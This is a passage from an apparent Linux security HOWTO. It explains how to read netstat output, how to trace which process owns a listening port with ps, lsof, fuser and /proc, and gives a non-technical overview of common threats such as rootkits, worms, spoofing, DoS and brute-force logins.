|tcp 400 0 bigcat:1152 bigcat:8000 CLOSE_WAIT |
|tcp 6648 0 bigcat:1162 bigcat:8000 CLOSE_WAIT |
|tcp 553 0 bigcat:1164 bigcat:8000 CLOSE_WAIT |
|udp 0 0 *:32768 *:* |
|udp 0 0 bigcat:domain *:* |
|udp 0 0 bigcat:domain *:* |
|udp 0 0 *:631 *:* |
| |
| |
+--------------------------------------------------------------------------------+
This output probably looks very different from what you get on your own
system. Notice the distinction between "Local Address" and "Foreign Address",
and how each includes a corresponding port number (or service name if
available) after the colon. "Local Address" is our end of the connection. The
first group with LISTEN in the far right hand column are services that are
running on this system. These are servers that are running in the background
on bigcat, and "listen" for incoming connections. So they have a port opened,
and this is where they "listen". These connections might come from the local
system (i.e. bigcat itself), or remote systems. This is very important
information to have! The others just below this are connections that have
been established from this system to other systems. The respective
connections are in varying states as indicated by the key words in the last
column. Those with no key word in the last column at the end are servers
responding to UDP connections. UDP is a different protocol from TCP
altogether, but is used for some types of low priority network traffic.
Now, the same thing with the "-n" flag to suppress converting to "names" so
we can actually see the port numbers:
+-----------------------------------------------------------------------------+
|$ netstat -taun |
|Active Internet connections (servers and established) |
|Proto Recv-Q Send-Q Local Address Foreign Address State |
|tcp 0 0 0.0.0.0:515 0.0.0.0:* LISTEN |
|tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN |
|tcp 0 0 192.168.1.1:53 0.0.0.0:* LISTEN |
|tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN |
|tcp 0 1 169.254.179.139:1174 64.152.100.93:119 SYN_SENT |
|tcp 0 1 169.254.179.139:1175 64.152.100.93:119 SYN_SENT |
|tcp 0 1 169.254.179.139:1173 64.152.100.93:119 SYN_SENT |
|tcp 0 0 169.254.179.139:1172 207.153.203.114:80 ESTABLISHED |
|tcp 1 0 169.254.179.139:1199 216.26.129.136:80 CLOSE_WAIT |
|tcp 0 0 169.254.179.139:80 63.236.92.144:34197 TIME_WAIT |
|tcp 400 0 127.0.0.1:1152 127.0.0.1:8000 CLOSE_WAIT |
|tcp 6648 0 127.0.0.1:1162 127.0.0.1:8000 CLOSE_WAIT |
|tcp 553 0 127.0.0.1:1164 127.0.0.1:8000 CLOSE_WAIT |
|udp 0 0 0.0.0.0:32768 0.0.0.0:* |
|udp 0 0 192.168.1.1:53 0.0.0.0:* |
|udp 0 0 127.0.0.1:53 0.0.0.0:* |
|udp 0 0 0.0.0.0:631 0.0.0.0:* |
| |
| |
+-----------------------------------------------------------------------------+
Let's look at the first few lines of this in detail. On line one,
+----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:515 0.0.0.0:* LISTEN |
| |
| |
+----------------------------------------------------------------------------+
"Local Address" is 0.0.0.0, meaning "all" interfaces that are available. The
local port is 515, or the standard print server port, usually owned by the
lpd daemon. You can find a listing of common service names and corresponding
ports in the file /etc/services.
The fact that it is listening on all interfaces is significant. In this case,
that would be lo (localhost), eth0, and eth1. Printer connections could
conceivably be made over any of these interfaces. Should a user on this
system bring up a PPP connection, then the print daemon would be listening on
that interface (ppp0) as well. The "Foreign Address" is also 0.0.0.0, meaning
from "anywhere".
It is also worth noting here, that even though this server is telling the
kernel to listen on all interfaces, the netstat output does not reflect
whether there may be a firewall in place that may be filtering incoming
connections. We just can't tell that at this point. Obviously, for certain
servers, this is very desirable. Nobody outside your own LAN has any reason
whatsoever to connect to your print server port for instance.
Line two is a little different:
+----------------------------------------------------------------------------+
| tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN |
| |
| |
+----------------------------------------------------------------------------+
Notice the "Local Address" this time is localhost's address of 127.0.0.1.
This is very significant as only connections local to this machine will be
accepted. So only bigcat can connect to bigcat's TCP port 8000. The security
implications should be obvious. Not all servers have configuration options
that allow this kind of restriction, but it is a very useful feature for
those that do. Port 8000 in this example, is owned by the web proxy
Junkbuster.
With the next three entries, we are back to listening on all available
interfaces:
+-----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
Looking at /etc/services, we can tell that port 37 is the "time" service, a
time server. Port 6000 is X11, and 80 is the standard port for HTTP servers
like Apache. There is nothing really unusual here, as these are all readily
available services on Linux.
The first two above are definitely not the kind of services you'd want just
anyone to connect to. These should be firewalled so that all outside
connections are refused. Again, we can't tell from this output whether any
firewall is in place, much less how effectively implemented it may be.
The web server on port 80 is not a huge security risk by itself. HTTP is a
protocol that is often open to all comers. For instance, if we wanted to host
our own home page, Apache can certainly do this for us. It is also possible
to firewall this off, so that it is only for use by our LAN clients as part
of an Intranet. Obviously too, if you do not have a good justification for
running a web server, then it should be disabled completely.
The next two lines are interesting:
+-----------------------------------------------------------------------------+
| tcp 0 0 192.168.1.1:53 0.0.0.0:* LISTEN |
| tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
Again notice the "Local Address" is not 0.0.0.0. This is good! The port this
time is 53, or the DNS port used by nameserver daemons like named. But we see
the nameserver daemon is only listening on the lo interface (localhost), and
the interface that connects bigcat to the LAN. So the kernel only allows
connections from localhost, and the LAN. There will be no port 53 available
to outside connections at all. This is a good example of how individual
applications can sometimes be securely configured. In this case, we are
probably looking at a caching DNS server since a real nameserver that is
responsible for handling DNS queries would have to have port 53 open to the
world. This is a security risk and requires special handling.
The last three LISTENER entries:
+-----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN |
| tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN |
| |
| |
+-----------------------------------------------------------------------------+
These are back to listening on all available interfaces. Port 22 is sshd, the
Secure Shell server daemon. This is a good sign! Notice that the service for
port 631 does not have a service name if we look at the output in the first
example. This might be a clue that something unusual is going on here. (See
the next section for the answer to this riddle.) And lastly, port 25, the
standard port for the SMTP mail daemon. Most Linux installations probably
will have an SMTP daemon running, so this is not necessarily unusual. But is
it necessary?
The next grouping is established connections. For our purposes the state of
the connection as indicated by the last column is not so important. This is
well explained in the man page.
+-------------------------------------------------------------------------------+
| tcp 0 1 169.254.179.139:1174 64.152.100.93:119 SYN_SENT |
| tcp 0 1 169.254.179.139:1175 64.152.100.93:119 SYN_SENT |
| tcp 0 1 169.254.179.139:1173 64.152.100.93:119 SYN_SENT |
| tcp 0 0 169.254.179.139:1172 207.153.203.114:80 ESTABLISHED |
| tcp 1 0 169.254.179.139:1199 216.26.129.136:80 CLOSE_WAIT |
| tcp 0 0 169.254.179.139:80 63.236.92.144:34197 TIME_WAIT |
| tcp 400 0 127.0.0.1:1152 127.0.0.1:8000 CLOSE_WAIT |
| tcp 6648 0 127.0.0.1:1162 127.0.0.1:8000 CLOSE_WAIT |
| tcp 553 0 127.0.0.1:1164 127.0.0.1:8000 CLOSE_WAIT |
| |
| |
+-------------------------------------------------------------------------------+
There are nine total connections here. The first three are connections from
our external interface to a remote host on its port 119, the standard NNTP
(News) port. There are three connections here to the same news server.
Apparently the application is multi-threaded, as it is trying to open
multiple connections to the news server. The next two entries are connections
to a remote web server as indicated by the port 80 after the colon in the
fifth column. Probably a pretty common looking entry for most of us. But the
one just after is reversed and has the port 80 in the fourth column, so this
is someone that has connected to bigcat's web server via its external,
Internet-side interface. The last three entries are all connections from
localhost to localhost. So we are connecting to ourselves here. Remembering
from above that port 8000 is bigcat's web proxy, this is a web browser that
is connected to the locally running proxy. The proxy then will open an
external connection of its own, which probably is what is going on with lines
four and five.
Since we gave netstat both the -t and -u options, we are getting both the TCP
and UDP listening servers. The last few lines are the UDP ones:
+----------------------------------------------------------------------------+
| udp 0 0 0.0.0.0:32768 0.0.0.0:* |
| udp 0 0 192.168.1.1:53 0.0.0.0:* |
| udp 0 0 127.0.0.1:53 0.0.0.0:* |
| udp 0 0 0.0.0.0:631 0.0.0.0:* |
| |
| |
+----------------------------------------------------------------------------+
The last three entries have ports that are familiar from the above
discussion. These are servers that are listening for both TCP and UDP
connections. Same servers in this case, just using two different protocols.
The first one on local port 32768 is new, and does not have a service name
available to it in /etc/services. So at first glance this should be
suspicious and pique our curiosity. See the next section for the explanation.
Can we draw any conclusions from this hypothetical situation? For the most
part, these look to be pretty normal looking network services and connections
for Linux. There does not seem to be an unduly high number of servers running
here, but that by itself does not mean much since we don't know if all these
servers are really required or not. We know that netstat cannot tell us if
any of these are effectively firewalled, so there is no way to say how secure
all this might be. We also don't really know if all the listening services
are really required by the owner here. That is something that varies widely
from installation to installation. Does bigcat even have a printer attached
for instance? Presumably it does, or this is a completely unnecessary risk.
-----------------------------------------------------------------------------
8.3.2. Port and Process Owners
We've learned a lot about what is going on with bigcat's networking from the
above section. But suppose we see something we don't recognize and want to
know what started that particular service? Or we want to stop a particular
server and it is not obvious from the above output?
The -p option should give us the process's PID and the program name that
started the process in the last column. Let's look at the TCP servers again
(with first three columns cropped for spacing). We'll have to run this as
root to get all the available information:
+----------------------------------------------------------------------------+
|# netstat -tap |
|Active Internet connections (servers and established) |
| Local Address Foreign Address State PID/Program name |
| *:printer *:* LISTEN 988/inetd |
| bigcat:8000 *:* LISTEN 1064/junkbuster |
| *:time *:* LISTEN 988/inetd |
| *:x11 *:* LISTEN 1462/X |
| *:http *:* LISTEN 1078/httpd |
| bigcat:domain *:* LISTEN 956/named |
| bigcat:domain *:* LISTEN 956/named |
| *:ssh *:* LISTEN 972/sshd |
| *:631 *:* LISTEN 1315/cupsd |
| *:smtp *:* LISTEN 1051/master |
| |
| |
+----------------------------------------------------------------------------+
Some of these we already know about. But we see now that the printer daemon
on port 515 is being started via inetd with a PID of "988". inetd is a
special situation: it is often called the "super server", since its main
role is to spawn sub-services. If we look at the first line, inetd is
listening on port 515 for printer services. If a connection comes for this
port, inetd intercepts it, and then will spawn the appropriate daemon, i.e.
the print daemon in this case. The configuration of how inetd handles this is
typically done in /etc/inetd.conf. This should tell us that if we want to
stop an inetd controlled server on a permanent basis, then we will have to
dig into the inetd (or perhaps xinetd) configuration. The time service
above is started via inetd as well. This should also tell us that these two
services can be further protected by tcpwrappers (discussed in Step 3 above).
This is one benefit of using inetd to control certain system services.
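To make the inetd model concrete, a printer entry in /etc/inetd.conf might
look something like the hypothetical line below. The daemon name and paths
are illustrative and vary by distribution; this is a sketch, not taken from
bigcat:

```
# /etc/inetd.conf -- hypothetical example; daemon and paths vary
# service  socket  proto  flags   user  server program   arguments
printer    stream  tcp    nowait  root  /usr/sbin/tcpd   /usr/sbin/lpd
```

Commenting out such a line and restarting inetd disables the service
permanently; invoking the daemon through tcpd is what puts tcpwrappers in
the path.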
We weren't sure about the service on port 631 above, since it did not have a
standard service name, which suggests something unusual or off the beaten
path. Now we see it is owned by cupsd, which is one of several print daemons
available under Linux. Port 631 happens to be cupsd's web interface for
controlling the printer service, something that is indeed a little different
from other print servers.
The last entry above is the SMTP mail server on bigcat. Often, this is
sendmail with many distributions. But not in this case. The command is
"master", which may not ring any bells. Armed with the program name we could
go searching the filesystem with tools like the locate or find commands.
After we found it, we could then probably discern what package it belonged
to. But with the PID available now, we can look at ps output, and see if that
helps us any:
+---------------------------------------------------------------------------+
| $ /bin/ps ax |grep 1051 |grep -v grep |
| 1051 ? S 0:24 /usr/libexec/postfix/master |
| |
| |
+---------------------------------------------------------------------------+
We took a shortcut here by combining ps with grep. It looks like this file
belongs to postfix, which is indeed a mail server package comparable to
sendmail.
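The grep shortcut works, but ps can also query one PID directly, which
avoids accidentally matching the grep process itself. A small sketch, using
the current shell's own PID ($$) so it can be tried anywhere; substitute the
PID reported by netstat:

```shell
# Ask ps about a single PID; the trailing "=" after each column name
# suppresses the header line. $$ (the shell's own PID) stands in for a
# PID taken from netstat output.
ps -p $$ -o pid=,user=,args=
```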
Running ps with the --forest option (the BSD-style f flag, as used below)
can be helpful in determining which processes are parents or children of
other processes. An edited example:
+---------------------------------------------------------------------------+
| $ /bin/ps -axf |
| 956 ? S 0:00 named -u named |
| 957 ? S 0:00 \_ named -u named |
| 958 ? S 0:46 \_ named -u named |
| 959 ? S 0:47 \_ named -u named |
| 960 ? S 0:00 \_ named -u named |
| 961 ? S 0:11 \_ named -u named |
| 1051 ? S 0:30 /usr/libexec/postfix/master |
| 1703 ? S 0:00 \_ tlsmgr -l -t fifo -u -c |
| 1704 ? S 0:00 \_ qmgr -l -t fifo -u -c |
| 1955 ? S 0:00 \_ pickup -l -t fifo -c |
| 1863 ? S 0:00 \_ trivial-rewrite -n rewrite -t unix -u -c |
| 2043 ? S 0:00 \_ cleanup -t unix -u -c |
| 2049 ? S 0:00 \_ local -t unix |
| 2062 ? S 0:00 \_ smtpd -n smtp -t inet -u -c |
| |
| |
+---------------------------------------------------------------------------+
A couple of things to note here. We have two by now familiar daemons here:
named and postfix (smtpd). Both are spawning sub-processes. In the case of
named, what we are seeing is threads, various sub-processes that it always
spawns. Postfix is also spawning sub-processes, but not as "threads". Each
sub-process has its own specific task. It is worth noting that child
processes are dependent on the parent process, so killing the parent PID
will in turn kill all its child processes.
If all this has not shed any light, we might also try locate:
+---------------------------------------------------------------------------+
| $ locate /master |
| /etc/postfix/master.cf |
| /var/spool/postfix/pid/master.pid |
| /usr/libexec/postfix/master |
| /usr/share/vim/syntax/master.vim |
| /usr/share/vim/vim60z/syntax/master.vim |
| /usr/share/doc/postfix-20010202/html/master.8.html |
| /usr/share/doc/postfix-20010202/master.cf |
| /usr/share/man/man8/master.8.gz |
| |
| |
+---------------------------------------------------------------------------+
find is perhaps the most flexible file-finding utility, but it doesn't use a
database the way locate does, so it is much slower:
+---------------------------------------------------------------------------+
| $ find / -name master |
| /usr/libexec/postfix/master |
| |
| |
+---------------------------------------------------------------------------+
If lsof is installed, it is another command that is useful for finding who
owns processes or ports:
+---------------------------------------------------------------------------+
| # lsof -i :631 |
| COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME |
| cupsd 1315 root 0u IPv4 3734 TCP *:631 (LISTEN) |
| |
| |
+---------------------------------------------------------------------------+
This is again telling us that the cupsd print daemon is the owner of port
631, just a different way of getting at it. Yet another option is fuser,
which should also be installed:
+---------------------------------------------------------------------------+
| # fuser -v -n tcp 631 |
| |
| USER PID ACCESS COMMAND |
| 631/tcp root 1315 f.... cupsd |
| |
| |
+---------------------------------------------------------------------------+
See the man pages for fuser and lsof command syntax.
Another place to look for where a service is started is the init.d
directory, where the actual init scripts live (for SysVinit systems).
Something like ls -l /etc/init.d/ should give us a list of these. Often the
script name itself gives a hint as to which service(s) it starts, though it
may not necessarily exactly match the "Program Name" as provided by netstat.
Or we can use grep to search inside files and match a search pattern. Need to
find where rpc.statd is being started, and we don't see a script by this
name?
+---------------------------------------------------------------------------+
| # grep rpc.statd /etc/init.d/* |
| /etc/init.d/nfslock: [ -x /sbin/rpc.statd ] || exit 0 |
| /etc/init.d/nfslock: daemon rpc.statd |
| /etc/init.d/nfslock: killproc rpc.statd |
| /etc/init.d/nfslock: status rpc.statd |
| /etc/init.d/nfslock: /sbin/pidof rpc.statd >/dev/null 2>&1; STATD="$?" |
| |
| |
+---------------------------------------------------------------------------+
We didn't really need all that information, but at least we see now exactly
which script is starting it. Remember too that not all services are started
this way. Some may be started via inetd, or xinetd.
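grep's -l option prints only the names of the matching files, which is often
all we need when hunting for the right init script. A self-contained sketch,
where a throwaway directory stands in for /etc/init.d:

```shell
# grep -l prints only the names of matching files, not the matching lines.
# A temporary directory with two fake init scripts stands in for
# /etc/init.d, so this example runs anywhere.
dir=$(mktemp -d)
printf 'daemon rpc.statd\n' > "$dir/nfslock"
printf 'daemon crond\n'     > "$dir/crond"
grep -l rpc.statd "$dir"/*   # prints only the nfslock script's path
rm -rf "$dir"
```

Against the real directory, the equivalent would be
grep -l rpc.statd /etc/init.d/*.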
The /proc filesystem also keeps everything we want to know about processes
that are running. We can query this to find out more information about each
process. Do you need to know the full path of the command that started a
process?
+-----------------------------------------------------------------------------+
| # ls -l /proc/1315/exe |
| lrwxrwxrwx 1 root root 0 July 4 19:41 /proc/1315/exe -> /usr/sbin/cupsd |
| |
| |
+-----------------------------------------------------------------------------+
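Besides "exe", each /proc/<pid>/ directory exposes other details, such as
the full command line (NUL-separated) the process was started with. A brief
sketch, using the shell's own PID ($$) so it can be run as-is; substitute
the PID you are investigating:

```shell
# readlink resolves the "exe" symlink to the full path of the binary;
# "cmdline" holds the NUL-separated command line the process started with.
readlink /proc/$$/exe
tr '\0' ' ' < /proc/$$/cmdline; echo
```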
Finally, we had a loose end or two in the UDP listening services. Remember we
had a strange looking port number 32768, that also had no service name
associated with it:
+------------------------------------------------------------------------------------+
| # netstat -aup |
| Active Internet connections (servers and established) |
| Local Address Foreign Address State PID/Program name |
| *:32768 *:* 956/named |
| bigcat:domain *:* 956/named |
| bigcat:domain *:* 956/named |
| *:631 *:* 1315/cupsd |
| |
| |
+------------------------------------------------------------------------------------+
Now by including the "PID/Program name" option with the -p flag, we see this
also belongs to named, the nameserver daemon. Recent versions of BIND use an
unprivileged port for some types of traffic. In this case, this is BIND 9.x.
So no real alarms here either. The unprivileged port here is the one named
uses to talk to other nameservers for name and address lookups, and it
should not be firewalled.
So we found no big surprises in this hypothetical situation.
If all else fails, and you can't find a process owner for an open port,
suspect that it may be an RPC (Remote Procedure Call) service of some kind.
These use randomly assigned ports without any seeming logic or consistency,
and are typically controlled by the portmap daemon. In some cases, these may
not reveal the process owner to netstat or lsof. Try stopping portmap, and
then see if the mystery service goes away. Or you can use rpcinfo -p
localhost to see what RPC services may be running (portmap must be running
for this to work).
Warning If you suspect you have been broken into, do not trust netstat or ps
output. There is a good chance that they, and other system
components, have been tampered with in such a way that the output is
not reliable.
-----------------------------------------------------------------------------
8.4. Attacks and Threats
In this section, we will take a quick look at some of the common threats and
techniques that are out there, and attempt to put them into some perspective.
The corporate world, government agencies and high profile Internet sites have
to be concerned with a much more diverse and challenging set of threats than
the typical home desktop user. There are many reasons someone may want to
break in to someone else's computer. It may be just for kicks, or any number
of malicious reasons. They may just want a base from which to attack someone
else. This is a very common motivation.
The most common "attack" for most of us is from already compromised systems.
The Internet is littered with computers that have been broken into, and are
now doing their master's bidding blindly, in zombie-like fashion. They are
programmed to scan massively large address ranges, probing each individual IP
address as they go. Looking for one or more open ports, and then probing for
known weaknesses if they get the chance. Very impersonal. Very methodical.
And very effective. We are all in the path of such robotic scans. All because
those responsible for these systems fail to do what you are doing now -
taking steps to protect their system(s), and avoid being r00ted.
These scans do not look at login banners that may be presented on connection.
It will do little good to change your /etc/issue.net to pretend that you are
running some obscure operating system. If they find something listening, they
will try all of the exploits appropriate to that port, without regard to any
indications your system may give. If it works, they are in -- if not, they
will move on.
-----------------------------------------------------------------------------
8.4.1. Port Scans and Probes
First, let's define "scan" and "probe" since these terms come up quite a bit.
A "probe" implies testing whether a given port is open or closed, and
possibly what might be listening on that port. A "scan" implies "probing"
either multiple ports on one or more systems, or individual ports on
multiple systems. So you might "scan" all ports on your own system, for
instance. Or a
cracker might "scan" the 216.78.*.* address range to see who has port 111
open.
Black hats can use scan and probe information to know what services are
running on a given system, and then they might know what exploits to try.
They may even be able to tell which Operating System, and even which
kernel version, is running, and thus get even more information. "Worms", on the other
hand, are automated and scan blindly, generally just looking for open ports,
and then a susceptible victim. They are not trying to "learn" anything, the
way a cracker might.
The distinction between "scan" and "probe" is often blurred. Both can be
used in good ways, or in bad ways, depending on who is doing it, and why. You might
ask a friend to scan you, for instance, to see how well your firewall is
working. This is a legitimate use of scanning tools such as nmap. But what if
someone you don't know does this? What is their intent? If it's your ISP,
they may be trying to enforce their Terms of Service Agreement. Or maybe, it
is someone just playing, and seeing who is "out there". But more than likely
it is someone or something with not such good intentions.
Full range port scans (meaning probes of many ports on the same machine)
seem to be a less common threat for home-based networks. But certainly,
scanning individual ports across numerous systems is a very, very common
occurrence.
-----------------------------------------------------------------------------
8.4.2. Rootkits
A "rootkit" is the script kiddie's stock in trade. When a successful
intrusion takes place, the first thing that is often done is to download and
install such "rootkits". The rootkit is a set of scripts designed to take
control of the system, and then hide the intrusion. Rootkits are readily
available on the web for various Operating Systems.
A rootkit will typically replace critical system files such as ls, ps,
netstat, login and others. Passwords may be added, hidden daemons started,
logs tampered with, and surely one or more backdoors are opened. The hidden
backdoors allow easy access any time the attacker wants back in. And often
the vulnerability itself may even be fixed so that the new "owner" has the
system all to himself. The entire process is scripted so it happens very
quickly. The rightful owners of these compromised systems generally have no
idea what is going on, and are victims themselves. A well designed rootkit
can be very difficult to detect.
-----------------------------------------------------------------------------
8.4.3. Worms and Zombies
A "worm" is a self replicating exploit. It infects a system, then attempts to
spread itself typically via the same vulnerability. Various "worms" are
weaving their way through the entire Internet address space constantly,
spreading themselves as they go.
But somewhere behind the zombie, there is a controller. Someone launched the
worm, and they will be informed after a successful intrusion. It is then up
to them how the system will be used.
Many of these worms run on compromised Linux systems, looking for other
Linux systems to "infect" via a number of exploits. But most Operating
Systems share in this threat.
Once a vulnerable system is found, the actual entry and take over is quick,
and may be difficult to detect after the fact. The first thing an intruder
(whether human or "worm") will do is attempt to cover their tracks. A
"rootkit" is downloaded and installed. This trend has been exacerbated by the
growing popularity of cable modems and DSL. The number of full time Internet
connections is growing rapidly, and this makes fertile ground for such
exploits since often these aren't as well secured as larger sites.
While this may sound ominous, a few simple precautions can effectively deter
this type of attack. With so many easy victims out there, why waste much
effort breaking into your system? There is no incentive to really try very
hard. Just scan, look, try, move on if unsuccessful. There are always more
IPs to be scanned. If your firewall is effectively bouncing this kind of
thing, it is no threat to you at all. Take comfort in that, and don't
over-react.
It is worth noting, that these worms cannot "force" their way in. They need
an open and accessible port, and a known vulnerability. If you remember the
"Iptables Weekly Log Summary" in the opening section above, many of those may
have all been the result of this type of scan. If you've followed the steps
in this HOWTO, you should be reasonably safe here. This one is easy enough to
deflect.
-----------------------------------------------------------------------------
8.4.4. Script Kiddies
A "script kiddie" is a "cracker" wanna be who doesn't know enough to come up
with his/her own exploits, but instead relies on "scripts" and exploits that
have been developed by others. Like "worms", they are looking for easy
victims, and may similarly scan large address ranges looking for specific
ports with known vulnerabilities. Often, the actual scanning is done from
already compromised systems, so that it is difficult to trace it back to
them.
The script kiddie has a bag of ready made tricks at his disposal, including
an arsenal of "rootkits" for various Operating Systems. Finding susceptible
victims is not so hard, given enough time and address space to probe. The
motives are a mixed bag as well. Simple mischief, defacement of web sites,
stolen credit card numbers, and the latest craze, "Denial of Service" attacks
(see below). They collect zombies like trophies and use them to carry out
whatever their objective is.
Again, the key here is that they are following a "script", and looking for
easy prey. Like the worm threat above, a functional firewall and a few very
basic precautions, should be sufficient to deflect any threat here. By now,
you should be relatively safe from this nuisance.
-----------------------------------------------------------------------------
8.4.5. Spoofed IPs
How easy is it to spoof an IP address? With the right tools, very easy. How
much of a threat is this? Not much, for most of us, and it is over-hyped as
a threat.
Because of the way TCP/IP works, each packet must carry both the source and
destination IP addresses. Any return traffic is based on this information. So
a spoofed IP can never return any useful information to an attacker who is
sending out spoofed packets. The traffic would go back to wherever that
spoofed IP address was pointed. The attacker gets nothing back at all.
This does have potential for "DoS" attacks (see below) where learning
something about the targeted system is not important. And may be used for
some general mischief making as well.
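One kernel-side guard related to spoofing is reverse-path filtering: the
kernel drops packets arriving on an interface it would not itself use to
reach the claimed source address. On Linux this is controlled by a sysctl,
which can be set persistently with a line such as the following (shown as a
sketch; apply it with sysctl -p as root):

```
# /etc/sysctl.conf
# Enable reverse-path (anti-spoofing) filtering on all interfaces
net.ipv4.conf.all.rp_filter = 1
```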
-----------------------------------------------------------------------------
8.4.6. Targeted Attacks
The worm and wide-ranging address scans are impersonal. They are just
looking for any vulnerable system. It makes no difference whether it is a top
secret government facility, or your mother's Windows box. But there are
"black hats" that will spend a great deal of effort to get into a system or
network. We'll call these "targeted" attacks since there has been a
deliberate decision made to break in to a specific system or network.
In this case, the attacker will look the system over for weaknesses. And
possibly make many different kinds of attempts, until he finds a crack to
wiggle through. Or gives up. This is more difficult to defend against. The
attacker is armed and dangerous, so to speak, and is stalking his prey.
Again, this scenario is very unlikely for a typical home system. There just
generally isn't any incentive to take the time and effort when there are
bigger fish to fry. For those who may be targets, the best defense here
includes many of the things we've discussed. Vigilance is probably more
important than ever. Good logging practices and an IDS (Intrusion Detection
System)
should be in place. And subscribing to one or more security related mailing
lists like BUGTRAQ. And of course, reading those alerts daily, and taking the
appropriate actions, etc.
-----------------------------------------------------------------------------
8.4.7. Denial of Service (DoS)
"DoS" is another type of "attack" in which the intention is to disrupt or
overwhelm the targeted system or network in such a way that it cannot
function normally. DoS can take many forms. On the Internet, this often means
overwhelming the victim's bandwidth or TCP/IP stack, by sending floods of
packets and thus effectively disabling the connection. We are talking about
many, many packets per second. Thousands in some cases. Or perhaps, the
objective is to crash a server.
This is much more likely to be targeted at organizations or high profile
sites, than home users. And can be quite challenging to stop depending on the
technique. And it generally requires the co-operation of networks between the
source(s) and the target, so that the floods are stopped, or minimized,
before they reach the targeted destination. Once they hit the destination,
there is no good way to completely ignore them.
"DDoS", Distributed Denial of Service, is where multiple sources are used to
maximize the impact. The sources are "slaves" that are "owned" by a cracker
or script kiddie, and that are woken up and targeted at the victim. There
may be many computers involved in the attack. Again, this is not likely to
be directly targeted at home users.
If you are home user, and with a dynamic IP address, you might find
disconnecting, then re-connecting to get a new IP, an effective way out if
you are the target. Maybe.
-----------------------------------------------------------------------------
8.4.8. Brute Force
"Brute force" attacks are where the attacker makes repetitive attempts at the
same perceived weakness(es). Like a battering ram. A classic example would be
where someone tries to access a telnet server simply by continually throwing
passwords at it, hoping that one will eventually work. Or maybe crash the
server. This doesn't require much imagination, and is not a commonly used
tactic against home systems.
By the way, this is one good argument against allowing remote root logins.
The root account exists on all systems. It is probably the only one that this
is true of. You'd like to make a potential attacker guess both the login name
and password. But if root is allowed remote logins, then the attacker only
needs to guess the password!
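With OpenSSH, for instance, remote root logins can be refused in the server
configuration, so an attacker must guess a login name as well as a password:

```
# /etc/ssh/sshd_config
PermitRootLogin no
```

sshd needs to be restarted (or signaled to reload its configuration) for the
change to take effect.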
-----------------------------------------------------------------------------
8.4.9. Viruses
And now something not to worry about. Viruses seem to be primarily a
Microsoft problem. For various reasons, viruses are not a significant threat
to Linux users. This is not to say that it will always be this way, but the
current virus explosion that plagues Microsoft systems cannot spread to
Linux (or Unix) based systems. In fact, the various methods and practices
that enable this phenomenon are not exploitable on Linux. So anti-virus
software is not recommended as part of our arsenal, at least for the time
being with Linux-only networks.
-----------------------------------------------------------------------------
8.5. Links
Some references for further reading are listed below. Not listed is your
distribution's site, security page or ftp download site. You will have to
find these on your own. Then you should bookmark them!
  * Other relevant documents available from the Linux Documentation Project:
Security HOWTO: [http://tldp.org/HOWTO/Security-HOWTO.html ] http://
tldp.org/HOWTO/Security-HOWTO.html
Firewall HOWTO: [http://tldp.org/HOWTO/Firewall-HOWTO.html] http://
tldp.org/HOWTO/Firewall-HOWTO.html
Ipchains HOWTO: [http://tldp.org/HOWTO/IPCHAINS-HOWTO.html ] http://
tldp.org/HOWTO/IPCHAINS-HOWTO.html
User Authentication: [http://tldp.org/HOWTO/User-Authentication-HOWTO/
index.html] http://tldp.org/HOWTO/User-Authentication-HOWTO/index.html,
includes a nice discussion on PAM.
VPN (Virtual Private Network): [http://tldp.org/HOWTO/VPN-HOWTO.html]
http://tldp.org/HOWTO/VPN-HOWTO.html and [http://tldp.org/HOWTO/
VPN-Masquerade-HOWTO.html] http://tldp.org/HOWTO/
VPN-Masquerade-HOWTO.html
The Remote X Apps Mini HOWTO, [http://www.tldp.org/HOWTO/mini/
Remote-X-Apps.html] http://www.tldp.org/HOWTO/mini/Remote-X-Apps.html,
includes excellent discussions on the security implications of running X
Windows.
The Linux Network Administrators Guide: [http://tldp.org/LDP/nag2/
index.html] http://tldp.org/LDP/nag2/index.html, includes a good overview
of networking and TCP/IP, and firewalling.
The Linux Administrator's Security Guide: [http://www.seifried.org/lasg/]
http://www.seifried.org/lasg/, includes many obvious topics of interest,
including firewalling, passwords and authentication, PAM, and more.
Securing Red Hat: [http://tldp.org/LDP/solrhe/
Securing-Optimizing-Linux-RH-Edition-v1.3/index.html] http://tldp.org/LDP
/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/index.html
  * Tools for creating custom ipchains and iptables firewall scripts:
Firestarter: [http://firestarter.sourceforge.net] http://
firestarter.sourceforge.net
Two related projects: [http://seawall.sourceforge.net/] http://
seawall.sourceforge.net/ for ipchains, and [http://
shorewall.sourceforge.net/] http://shorewall.sourceforge.net/ for
iptables.
  * Netfilter and iptables documentation from the netfilter developers
(available in many other languages as well):
FAQ: [http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html]
http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html
Packet filtering: [http://netfilter.samba.org/documentation/HOWTO/
packet-filtering-HOWTO.html] http://netfilter.samba.org/documentation/
HOWTO/packet-filtering-HOWTO.html
Networking: [http://netfilter.samba.org/documentation/HOWTO/
networking-concepts-HOWTO.html] http://netfilter.samba.org/documentation/
HOWTO/networking-concepts-HOWTO.html
NAT/masquerading: [http://netfilter.samba.org/documentation/HOWTO/
